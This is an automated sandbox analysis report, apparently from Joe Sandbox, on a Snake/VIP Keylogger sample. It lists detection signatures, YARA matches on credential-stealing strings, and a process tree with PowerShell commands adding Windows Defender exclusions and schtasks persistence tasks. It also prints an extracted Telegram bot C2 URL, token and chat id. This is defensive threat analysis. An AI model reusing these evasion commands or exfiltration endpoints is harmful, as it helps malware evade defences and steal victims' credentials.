Edit tour

Windows Analysis Report
OtldpQxzAw.exe

Overview

General Information

Sample name:	OtldpQxzAw.exe renamed because original name is a hash value
Original sample name:	faa9fee2bec12a0b25d42223d3171fb74343937b0d4f3b15a02135e1f60367de.exe
Analysis ID:	1632374
MD5:	3d54923bbe333fb9cbb379196b4702aa
SHA1:	90e990b7fca001ab4dd03f3bf205c957b53fdfbe
SHA256:	faa9fee2bec12a0b25d42223d3171fb74343937b0d4f3b15a02135e1f60367de
Tags:	exeSnakeKeyloggeruser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

OtldpQxzAw.exe (PID: 6416 cmdline: "C:\Users\user\Desktop\OtldpQxzAw.exe" MD5: 3D54923BBE333FB9CBB379196B4702AA)

powershell.exe (PID: 6896 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\OtldpQxzAw.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6936 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 6152 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 7064 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wiSeRRwvZHTk" /XML "C:\Users\user\AppData\Local\Temp\tmp53CF.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

OtldpQxzAw.exe (PID: 5628 cmdline: "C:\Users\user\Desktop\OtldpQxzAw.exe" MD5: 3D54923BBE333FB9CBB379196B4702AA)

OtldpQxzAw.exe (PID: 808 cmdline: "C:\Users\user\Desktop\OtldpQxzAw.exe" MD5: 3D54923BBE333FB9CBB379196B4702AA)

wiSeRRwvZHTk.exe (PID: 2664 cmdline: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe MD5: 3D54923BBE333FB9CBB379196B4702AA)

schtasks.exe (PID: 6544 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wiSeRRwvZHTk" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wiSeRRwvZHTk.exe (PID: 5172 cmdline: "C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe" MD5: 3D54923BBE333FB9CBB379196B4702AA)

svchost.exe (PID: 6940 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7990821173:AAFE3sYvVMUi8WKwRekB6r0KOeDU9Se_Bf0/sendMessage"}

Threatname: VIP Keylogger

{"Exfil Mode": "Telegram", "Bot Token": "7990821173:AAFE3sYvVMUi8WKwRekB6r0KOeDU9Se_Bf0", "Chat id": "5022382431"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7990821173:AAFE3sYvVMUi8WKwRekB6r0KOeDU9Se_Bf0", "Chat_id": "5022382431", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.3301331554.000000000042E000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000009.00000002.3301331554.000000000042E000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2147:$a1: get_encryptedPassword 0x2470:$a2: get_encryptedUsername 0x1f57:$a3: get_timePasswordChanged 0x2060:$a4: get_passwordField 0x215d:$a5: set_encryptedPassword 0x37f1:$a7: get_logins 0x3754:$a10: KeyLoggerEventArgs 0x33b9:$a11: KeyLoggerEventArgsEventHandler
0000000E.00000002.3306390132.00000000030F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000E.00000002.3306390132.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000002.955729902.0000000004CB4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.955729902.0000000004CB4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000A.00000002.955729902.0000000004CB4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000002.955729902.0000000004CB4000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e79f:$a1: get_encryptedPassword 0x2eac8:$a2: get_encryptedUsername 0x2e5af:$a3: get_timePasswordChanged 0x2e6b8:$a4: get_passwordField 0x2e7b5:$a5: set_encryptedPassword 0x2fe49:$a7: get_logins 0x2fdac:$a10: KeyLoggerEventArgs 0x2fa11:$a11: KeyLoggerEventArgsEventHandler
00000009.00000002.3307087462.0000000002CAC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000009.00000002.3301331554.0000000000439000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.3307087462.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.903173734.0000000004253000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.903173734.0000000004253000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.903173734.0000000004253000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000002.955729902.0000000004AD4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.955729902.0000000004AD4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000A.00000002.955729902.0000000004AD4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.903173734.0000000004253000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e78f:$a1: get_encryptedPassword 0x725af:$a1: get_encryptedPassword 0xb61cf:$a1: get_encryptedPassword 0x2eab8:$a2: get_encryptedUsername 0x728d8:$a2: get_encryptedUsername 0xb64f8:$a2: get_encryptedUsername 0x2e59f:$a3: get_timePasswordChanged 0x723bf:$a3: get_timePasswordChanged 0xb5fdf:$a3: get_timePasswordChanged 0x2e6a8:$a4: get_passwordField 0x724c8:$a4: get_passwordField 0xb60e8:$a4: get_passwordField 0x2e7a5:$a5: set_encryptedPassword 0x725c5:$a5: set_encryptedPassword 0xb61e5:$a5: set_encryptedPassword 0x2fe39:$a7: get_logins 0x73c59:$a7: get_logins 0xb7879:$a7: get_logins 0x2fd9c:$a10: KeyLoggerEventArgs 0x73bbc:$a10: KeyLoggerEventArgs 0xb77dc:$a10: KeyLoggerEventArgs
0000000A.00000002.955729902.0000000004AD4000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2ed4f:$a1: get_encryptedPassword 0x7296f:$a1: get_encryptedPassword 0x2f078:$a2: get_encryptedUsername 0x72c98:$a2: get_encryptedUsername 0x2eb5f:$a3: get_timePasswordChanged 0x7277f:$a3: get_timePasswordChanged 0x2ec68:$a4: get_passwordField 0x72888:$a4: get_passwordField 0x2ed65:$a5: set_encryptedPassword 0x72985:$a5: set_encryptedPassword 0x303f9:$a7: get_logins 0x74019:$a7: get_logins 0x3035c:$a10: KeyLoggerEventArgs 0x73f7c:$a10: KeyLoggerEventArgs 0x2ffc1:$a11: KeyLoggerEventArgsEventHandler 0x73be1:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: OtldpQxzAw.exe PID: 6416	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: OtldpQxzAw.exe PID: 6416	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: OtldpQxzAw.exe PID: 6416	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: OtldpQxzAw.exe PID: 6416	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: OtldpQxzAw.exe PID: 6416	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x8944c:$a1: get_encryptedPassword 0x8976b:$a2: get_encryptedUsername 0x89266:$a3: get_timePasswordChanged 0x8936f:$a4: get_passwordField 0x89462:$a5: set_encryptedPassword 0x8b93f:$a7: get_logins 0x8b8a2:$a10: KeyLoggerEventArgs 0x8b50b:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: OtldpQxzAw.exe PID: 808	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: OtldpQxzAw.exe PID: 808	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: OtldpQxzAw.exe PID: 808	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: OtldpQxzAw.exe PID: 808	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xe532:$a1: get_encryptedPassword 0xe851:$a2: get_encryptedUsername 0xe34c:$a3: get_timePasswordChanged 0xe455:$a4: get_passwordField 0xe548:$a5: set_encryptedPassword 0x10a25:$a7: get_logins 0x10988:$a10: KeyLoggerEventArgs 0x105f1:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: wiSeRRwvZHTk.exe PID: 2664	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: wiSeRRwvZHTk.exe PID: 2664	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: wiSeRRwvZHTk.exe PID: 2664	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: wiSeRRwvZHTk.exe PID: 2664	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: wiSeRRwvZHTk.exe PID: 2664	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2f4d3:$a1: get_encryptedPassword 0x4f2cc:$a1: get_encryptedPassword 0x2f7f2:$a2: get_encryptedUsername 0x4f5eb:$a2: get_encryptedUsername 0x2f2ed:$a3: get_timePasswordChanged 0x4f0e6:$a3: get_timePasswordChanged 0x2f3f6:$a4: get_passwordField 0x4f1ef:$a4: get_passwordField 0x2f4e9:$a5: set_encryptedPassword 0x4f2e2:$a5: set_encryptedPassword 0x319c6:$a7: get_logins 0x517bf:$a7: get_logins 0x31929:$a10: KeyLoggerEventArgs 0x51722:$a10: KeyLoggerEventArgs 0x31592:$a11: KeyLoggerEventArgsEventHandler 0x5138b:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: wiSeRRwvZHTk.exe PID: 5172	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: wiSeRRwvZHTk.exe PID: 5172	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 30 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.2.wiSeRRwvZHTk.exe.4ad4a08.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.wiSeRRwvZHTk.exe.4ad4a08.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.wiSeRRwvZHTk.exe.4ad4a08.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.wiSeRRwvZHTk.exe.4ad4a08.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c547:$a1: get_encryptedPassword 0x2c870:$a2: get_encryptedUsername 0x2c357:$a3: get_timePasswordChanged 0x2c460:$a4: get_passwordField 0x2c55d:$a5: set_encryptedPassword 0x2dbf1:$a7: get_logins 0x2db54:$a10: KeyLoggerEventArgs 0x2d7b9:$a11: KeyLoggerEventArgsEventHandler
10.2.wiSeRRwvZHTk.exe.4ad4a08.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3a281:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39924:$a3: \Google\Chrome\User Data\Default\Login Data 0x39b81:$a4: \Orbitum\User Data\Default\Login Data 0x3a560:$a5: \Kometa\User Data\Default\Login Data
10.2.wiSeRRwvZHTk.exe.4ad4a08.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d168:$s1: UnHook 0x2d16f:$s2: SetHook 0x2d177:$s3: CallNextHook 0x2d184:$s4: _hook
10.2.wiSeRRwvZHTk.exe.4cb4458.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.wiSeRRwvZHTk.exe.4cb4458.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.wiSeRRwvZHTk.exe.4cb4458.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.wiSeRRwvZHTk.exe.4cb4458.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c547:$a1: get_encryptedPassword 0x2c870:$a2: get_encryptedUsername 0x2c357:$a3: get_timePasswordChanged 0x2c460:$a4: get_passwordField 0x2c55d:$a5: set_encryptedPassword 0x2dbf1:$a7: get_logins 0x2db54:$a10: KeyLoggerEventArgs 0x2d7b9:$a11: KeyLoggerEventArgsEventHandler
10.2.wiSeRRwvZHTk.exe.4cb4458.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3a281:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39924:$a3: \Google\Chrome\User Data\Default\Login Data 0x39b81:$a4: \Orbitum\User Data\Default\Login Data 0x3a560:$a5: \Kometa\User Data\Default\Login Data
10.2.wiSeRRwvZHTk.exe.4cb4458.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d168:$s1: UnHook 0x2d16f:$s2: SetHook 0x2d177:$s3: CallNextHook 0x2d184:$s4: _hook
0.2.OtldpQxzAw.exe.4297268.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.OtldpQxzAw.exe.4297268.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.OtldpQxzAw.exe.4297268.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.OtldpQxzAw.exe.4297268.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c547:$a1: get_encryptedPassword 0x2c870:$a2: get_encryptedUsername 0x2c357:$a3: get_timePasswordChanged 0x2c460:$a4: get_passwordField 0x2c55d:$a5: set_encryptedPassword 0x2dbf1:$a7: get_logins 0x2db54:$a10: KeyLoggerEventArgs 0x2d7b9:$a11: KeyLoggerEventArgsEventHandler
0.2.OtldpQxzAw.exe.4297268.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3a281:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39924:$a3: \Google\Chrome\User Data\Default\Login Data 0x39b81:$a4: \Orbitum\User Data\Default\Login Data 0x3a560:$a5: \Kometa\User Data\Default\Login Data
0.2.OtldpQxzAw.exe.4297268.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d168:$s1: UnHook 0x2d16f:$s2: SetHook 0x2d177:$s3: CallNextHook 0x2d184:$s4: _hook
10.2.wiSeRRwvZHTk.exe.4cb4458.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.wiSeRRwvZHTk.exe.4cb4458.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.wiSeRRwvZHTk.exe.4cb4458.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.wiSeRRwvZHTk.exe.4cb4458.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e347:$a1: get_encryptedPassword 0x2e670:$a2: get_encryptedUsername 0x2e157:$a3: get_timePasswordChanged 0x2e260:$a4: get_passwordField 0x2e35d:$a5: set_encryptedPassword 0x2f9f1:$a7: get_logins 0x2f954:$a10: KeyLoggerEventArgs 0x2f5b9:$a11: KeyLoggerEventArgsEventHandler
10.2.wiSeRRwvZHTk.exe.4cb4458.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c081:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b724:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b981:$a4: \Orbitum\User Data\Default\Login Data 0x3c360:$a5: \Kometa\User Data\Default\Login Data
0.2.OtldpQxzAw.exe.4253448.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.OtldpQxzAw.exe.4253448.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.OtldpQxzAw.exe.4253448.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.wiSeRRwvZHTk.exe.4cb4458.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ef68:$s1: UnHook 0x2ef6f:$s2: SetHook 0x2ef77:$s3: CallNextHook 0x2ef84:$s4: _hook
0.2.OtldpQxzAw.exe.4253448.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c547:$a1: get_encryptedPassword 0x2c870:$a2: get_encryptedUsername 0x2c357:$a3: get_timePasswordChanged 0x2c460:$a4: get_passwordField 0x2c55d:$a5: set_encryptedPassword 0x2dbf1:$a7: get_logins 0x2db54:$a10: KeyLoggerEventArgs 0x2d7b9:$a11: KeyLoggerEventArgsEventHandler
0.2.OtldpQxzAw.exe.4253448.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3a281:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39924:$a3: \Google\Chrome\User Data\Default\Login Data 0x39b81:$a4: \Orbitum\User Data\Default\Login Data 0x3a560:$a5: \Kometa\User Data\Default\Login Data
0.2.OtldpQxzAw.exe.4253448.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d168:$s1: UnHook 0x2d16f:$s2: SetHook 0x2d177:$s3: CallNextHook 0x2d184:$s4: _hook
0.2.OtldpQxzAw.exe.4297268.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.OtldpQxzAw.exe.4297268.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.OtldpQxzAw.exe.4297268.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.OtldpQxzAw.exe.4297268.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e347:$a1: get_encryptedPassword 0x71f67:$a1: get_encryptedPassword 0x2e670:$a2: get_encryptedUsername 0x72290:$a2: get_encryptedUsername 0x2e157:$a3: get_timePasswordChanged 0x71d77:$a3: get_timePasswordChanged 0x2e260:$a4: get_passwordField 0x71e80:$a4: get_passwordField 0x2e35d:$a5: set_encryptedPassword 0x71f7d:$a5: set_encryptedPassword 0x2f9f1:$a7: get_logins 0x73611:$a7: get_logins 0x2f954:$a10: KeyLoggerEventArgs 0x73574:$a10: KeyLoggerEventArgs 0x2f5b9:$a11: KeyLoggerEventArgsEventHandler 0x731d9:$a11: KeyLoggerEventArgsEventHandler
0.2.OtldpQxzAw.exe.4297268.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c081:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7fca1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b724:$a3: \Google\Chrome\User Data\Default\Login Data 0x7f344:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b981:$a4: \Orbitum\User Data\Default\Login Data 0x7f5a1:$a4: \Orbitum\User Data\Default\Login Data 0x3c360:$a5: \Kometa\User Data\Default\Login Data 0x7ff80:$a5: \Kometa\User Data\Default\Login Data
0.2.OtldpQxzAw.exe.4297268.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ef68:$s1: UnHook 0x72b88:$s1: UnHook 0x2ef6f:$s2: SetHook 0x72b8f:$s2: SetHook 0x2ef77:$s3: CallNextHook 0x72b97:$s3: CallNextHook 0x2ef84:$s4: _hook 0x72ba4:$s4: _hook
0.2.OtldpQxzAw.exe.4253448.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.OtldpQxzAw.exe.4253448.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.OtldpQxzAw.exe.4253448.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.OtldpQxzAw.exe.4253448.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e347:$a1: get_encryptedPassword 0x72167:$a1: get_encryptedPassword 0xb5d87:$a1: get_encryptedPassword 0x2e670:$a2: get_encryptedUsername 0x72490:$a2: get_encryptedUsername 0xb60b0:$a2: get_encryptedUsername 0x2e157:$a3: get_timePasswordChanged 0x71f77:$a3: get_timePasswordChanged 0xb5b97:$a3: get_timePasswordChanged 0x2e260:$a4: get_passwordField 0x72080:$a4: get_passwordField 0xb5ca0:$a4: get_passwordField 0x2e35d:$a5: set_encryptedPassword 0x7217d:$a5: set_encryptedPassword 0xb5d9d:$a5: set_encryptedPassword 0x2f9f1:$a7: get_logins 0x73811:$a7: get_logins 0xb7431:$a7: get_logins 0x2f954:$a10: KeyLoggerEventArgs 0x73774:$a10: KeyLoggerEventArgs 0xb7394:$a10: KeyLoggerEventArgs
0.2.OtldpQxzAw.exe.4253448.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c081:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7fea1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc3ac1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b724:$a3: \Google\Chrome\User Data\Default\Login Data 0x7f544:$a3: \Google\Chrome\User Data\Default\Login Data 0xc3164:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b981:$a4: \Orbitum\User Data\Default\Login Data 0x7f7a1:$a4: \Orbitum\User Data\Default\Login Data 0xc33c1:$a4: \Orbitum\User Data\Default\Login Data 0x3c360:$a5: \Kometa\User Data\Default\Login Data 0x80180:$a5: \Kometa\User Data\Default\Login Data 0xc3da0:$a5: \Kometa\User Data\Default\Login Data
0.2.OtldpQxzAw.exe.4253448.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ef68:$s1: UnHook 0x72d88:$s1: UnHook 0xb69a8:$s1: UnHook 0x2ef6f:$s2: SetHook 0x72d8f:$s2: SetHook 0xb69af:$s2: SetHook 0x2ef77:$s3: CallNextHook 0x72d97:$s3: CallNextHook 0xb69b7:$s3: CallNextHook 0x2ef84:$s4: _hook 0x72da4:$s4: _hook 0xb69c4:$s4: _hook
10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e347:$a1: get_encryptedPassword 0x71f67:$a1: get_encryptedPassword 0x2e670:$a2: get_encryptedUsername 0x72290:$a2: get_encryptedUsername 0x2e157:$a3: get_timePasswordChanged 0x71d77:$a3: get_timePasswordChanged 0x2e260:$a4: get_passwordField 0x71e80:$a4: get_passwordField 0x2e35d:$a5: set_encryptedPassword 0x71f7d:$a5: set_encryptedPassword 0x2f9f1:$a7: get_logins 0x73611:$a7: get_logins 0x2f954:$a10: KeyLoggerEventArgs 0x73574:$a10: KeyLoggerEventArgs 0x2f5b9:$a11: KeyLoggerEventArgsEventHandler 0x731d9:$a11: KeyLoggerEventArgsEventHandler
